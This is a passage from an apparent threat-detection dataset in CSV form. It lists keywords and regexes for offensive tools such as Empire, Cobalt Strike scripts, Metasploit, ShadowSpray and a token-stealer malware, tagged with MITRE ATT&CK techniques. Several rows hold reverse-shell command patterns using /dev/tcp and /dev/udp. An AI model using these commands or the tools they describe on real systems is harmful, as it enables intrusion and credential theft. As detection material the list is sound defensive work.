TA0003","N/A","N/A","Persistence","https://github.com/xorrior/RandomPS-Scripts","1","0","N/A","10","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*Set-WorkingHours*",".{0,1000}Set\-WorkingHours.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*seventeenman/CallBackDump*",".{0,1000}seventeenman\/CallBackDump.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","531","75","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*sfp_portscan_tcp.py*",".{0,1000}sfp_portscan_tcp\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*sfp_torexits.py*",".{0,1000}sfp_torexits\.py.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*sh -c *ping -c 2 %s grep %s /proc/net/arp >/tmp/gx *",".{0,1000}sh\s\-c\s.{0,1000}ping\s\-c\s2\s\%s\s\sgrep\s\%s\s\/proc\/net\/arp\s\>\/tmp\/gx\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*sh -i >& /dev/tcp/*/* 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sh -i >& /dev/udp/*/* 0>&1*",".{0,1000}sh\s\-i\s\>\&\s\/dev\/udp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*sh -i 5<> /dev/tcp/*/* 0<&5 1>&5 2>&5*",".{0,1000}sh\s\-i\s5\<\>\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\<\&5\s1\>\&5\s2\>\&5.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Sha-2-*512.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-.{0,1000}512\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Sha-2-256.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-256\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Sha-2-384.unverified.test-vectors.txt*",".{0,1000}Sha\-2\-384\.unverified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*shadawck/glit*",".{0,1000}shadawck\/glit.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*shadawck/recon-archy*",".{0,1000}shadawck\/recon\-archy.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*shadow_copy.rb*",".{0,1000}shadow_copy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*shadow1ng/fscan*",".{0,1000}shadow1ng\/fscan.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*shadowclock*",".{0,1000}shadowclock.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shadowclone *",".{0,1000}shadowclone\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*shadowcoerce.py *",".{0,1000}shadowcoerce\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*shadowcoerce_check*",".{0,1000}shadowcoerce_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*shadowcopy enum*",".{0,1000}shadowcopy\senum.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*shadowdump.*",".{0,1000}shadowdump\..{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*ShadowForge.py*",".{0,1000}ShadowForge\.py.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*ShadowForgeC2-main*",".{0,1000}ShadowForgeC2\-main.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*ShadowSpray recovered*",".{0,1000}ShadowSpray\srecovered.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray.Asn1*",".{0,1000}ShadowSpray\.Asn1.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray.DSInternals*",".{0,1000}ShadowSpray\.DSInternals.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ShadowSpray.exe*",".{0,1000}ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray.Kerb*",".{0,1000}ShadowSpray\.Kerb.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray.Kerb.lib*",".{0,1000}ShadowSpray\.Kerb\.lib.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ShadowSpray.sln*",".{0,1000}ShadowSpray\.sln.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowSpray-master*",".{0,1000}ShadowSpray\-master.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","1","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*ShadowUser/scvhost.exe*",".{0,1000}ShadowUser\/scvhost\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*share/hiphp.py*",".{0,1000}share\/hiphp\.py.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*share_listing/ALL_COMBINED_RESULTS.TXT*",".{0,1000}share_listing\/ALL_COMBINED_RESULTS\.TXT.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*shareenum.py*",".{0,1000}shareenum\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*shareenumeration*",".{0,1000}shareenumeration.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*SharepointExploiter.ps1*",".{0,1000}SharepointExploiter\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*SharepointSiteExploiter.ps1*",".{0,1000}SharepointSiteExploiter\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*Shares/cme_spider_plus*",".{0,1000}Shares\/cme_spider_plus.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Shares/finduncshar_*.txt*",".{0,1000}Shares\/finduncshar_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items*decrypted_cookie*",".{0,1000}\-\-Sharing\-this\-will\-allow\-someone\-to\-log\-in\-as\-you\-and\-to\-steal\-your\-ROBUX\-and\-items.{0,1000}decrypted_cookie.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*sharp ADCollector*",".{0,1000}sharp\sADCollector.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp ADSearch*",".{0,1000}sharp\sADSearch.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp BetterSafetyKatz*",".{0,1000}sharp\sBetterSafetyKatz.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*Sharp Compile*",".{0,1000}Sharp\sCompile.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*sharp init download/update SharpCollection tools*",".{0,1000}sharp\sinit\s\sdownload\/update\sSharpCollection\stools.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp InveighZero*",".{0,1000}sharp\sInveighZero.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpAllowedToAct*",".{0,1000}sharp\sSharpAllowedToAct.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpAppLocker*",".{0,1000}sharp\sSharpAppLocker.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpChisel*",".{0,1000}sharp\sSharpChisel.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpChromium*",".{0,1000}sharp\sSharpChromium.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*sharp SharpCrashEventLog *",".{0,1000}sharp\sSharpCrashEventLog\s.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" 